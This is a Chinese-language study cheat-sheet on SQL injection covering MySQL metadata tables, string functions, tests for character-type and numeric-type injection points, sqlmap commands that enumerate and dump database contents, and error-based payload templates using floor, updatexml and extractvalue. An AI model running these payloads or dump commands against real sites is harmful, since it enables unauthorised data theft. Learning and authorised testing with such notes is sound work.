sql注入

# SQL注入小记

## 分类

联合查询

布尔盲注

报错注入

延时注入

堆叠查询

get  post  cookie  http头部

## mysql元数据库数据库 information_schema

    information_schema

            ---tables

                    ---table_name

                    ---table_schema

            ---columns

                    ---column_name

                    ---table_name

                    ---tbale_schema

## mysql 常用函数

select version();

select database(); 当前数据库

selsect user(); 用户名 

select current_user();当前

select system_user();系统

select @@datadir; 数据库路径

select @@version_complie_os; 操作系统版本

select length(database());

substring(截取的字符串,起点,长度) 截取字符串 

left("12345",3) 123

concat('a','b','c') abc

concat_ws("-",'a','b','c') a-b-c

group_concat()

ord() 返回ascii码

rand() 0-1 随机数 left(rand(),3)  0.1/0.2/....

sleep() 睡眠

if(判断,t,f) 

and>or 优先级；

## 注入点判断

字符型注入

当输入的参数x为字符型时，通常sql语句会这样的

select *from users where id =**'**x**'**

这种类型我们可以使用and ‘1’='1 和 and ‘1’='2来进行测试

www.xxx.com/ccc.php?id=1’ and ‘1’='1

页面正常，继续下一步

www.xxx.com/ccc.php?id=1’ and ‘1’='2

页面报错，则说明存在字符型注入。

原因如下：

当输入and ‘1’=‘1的时候，后台执行的语句是

select* from users where id=**'**x' and '1'='1**'**

语法正确，逻辑判断正确，返回正确

当输入and ‘1’=‘2的时候，后台执行的语句是

select * from users where id=**'**x' and '1'='2**'**

语法正确，逻辑判断错误，返回错误

字符型和数字型最大的一个区别在于，数字型不需要单引号来闭合，而字符串一般需要通过单引号来闭合的。

数字型注入

当输入的参数x为整型的时候，通常sql语句是这样的

select *from users where id =x

这种类型可以使用经典的and 1=1 and 1=2来判断

url地址中输入www.xxxx.com/ccc.php?id=x and 1=1

页面显示正常，继续下一步

url地址中输入www.xxxx.com/ccc.php?id=x and 1=2

页面错误，这说明存在数字型注入。

原因如下：

当输入and 1=1时，后台会执行sql语句是

select* from users where id =x and 1=1；

没有语法显示错误且，返回正常

当输入and 1=2时，后台会执行sql语句是

select *from users where id =1 and 1=2;

没有语法错误且，返回错误

我们在使用假设：

如果是字符型注入的话，我们输入的语句应该会出现这样的状况

select* from users where id ='1 and 1=1'; 

select * from users where id ='1 and 1=2';

查询语句将and语句全部转换成字符串，并没有进行and的逻辑判断，所以不会出现以上结果，所以这个等式是不成立的。

## 口诀

是否回显 联合查询

是否报错 报错注入

是否有布尔类型 布尔盲注

延时注入

## sqlmap

-u "url" 检测注入点

--dbs 列出所有数据库名

--current-db 当前数据库名

-D 指定数据库

--tables 列出表名

-T 指定表名

--columns 列出所有的字符段名

-C 指定字段

--dump 列出字段内容

post注入

sqlmap -r post.txt

## 报错注入

1 通过floor报错

        and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))as x from information_schema.tables group by x)as y)

2 通过updatexml报错 

        and updatexml(1,payload,1)

3 通过 extractvalue报错

        and extractvalue(1,payload)